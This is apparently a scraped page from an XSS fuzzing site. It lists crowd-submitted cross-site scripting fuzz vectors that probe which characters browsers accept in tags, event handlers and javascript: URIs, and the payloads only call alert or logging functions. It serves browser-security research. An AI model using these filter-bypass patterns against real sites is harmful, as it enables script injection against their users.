Featured vector

Firefox 0.0
<script src=data:0x2calert(1)></script>

Fuzz vector cloud

5,456,811 Successful fuzzes

Fuzz Vectors

Searching for "char"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
Possibility of XSS via lead bytes <html> <head> <title>Possibility of XSS via lead bytes... @irsdl</title> <!-- <meta charset="utf-8"> or <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> Ref: https://code.google.com/p/doctype-mirror/wiki/MetaCharsetAttribute --> </head> <body> <p><input size=20 value="*chr*"></p> <p><input size=20 value="<script>logChr(*num*)</script>"></p> <!-- References: http://powerofcommunity.net/poc2008/hasegawa.pptx http://websecurity.com.ua/2928/ https://bugzilla.mozilla.org/show_bug.cgi?id=690225 --> </body> </html> @irsdl
replacement *chr*img src=xx:xx onerror=logChr(*num*)> @matttiko
char after lt and before still valid html <*chr*,script>logChr(*num*);</script> @p_laguna
Separators <svg*chr*onload=logChr(*num*)> @JohnathanKuskos
charecter between two URI <a href="http://*chr*javascript:alert(1)">testxss</a> @Mramydnei
Characters allowed before script tag name <*chr*script> logChr(*num*) </script> @tifkin_
allowed char in js comment <script>logChr(*num*)<*chr*!-- '</script> @insertScript
img onload with only one char in src <img src=*chr* onload=logChr(*num*)> @insertScript
char after lt still valid html <*chr*a href=x onerror=logChr(*num*)> @ethicalhack3r
lt eating char log <img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)"> @insertScript
lt eating char v2 <img src=x *chr*> onerror=logChr(*num*)> @insertScript
lt eating char <img src=x *chr*> onerror=logChr(*num*)> @insertScript
chars allowed after colon v2 htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed in colon v2 htmlStr = '<a href="javascript&col'+*chr*+'on;123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed after colon htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*chr*); } }catch(e){}; @heyheyheyhey10
Replacement for s in script tag <*chr*cript>logChr(*num*)</script> @blubbfiction
char for fireing onload event <img src=*chr* onload=logChr(*num*)> @heyheyheyhey10
Char that allows you to act as a slash in closing tag 2 <script>log(*num*)<*chr*script></script> @notxssninja
Char after lt <*chr*script>alert(*num*)</script> @ethicalhack3r
Characters consuming backslashes and breaking JS strings <script>a='abc\*chr*\';log(*num*)//def';</script> @0x6D6172696F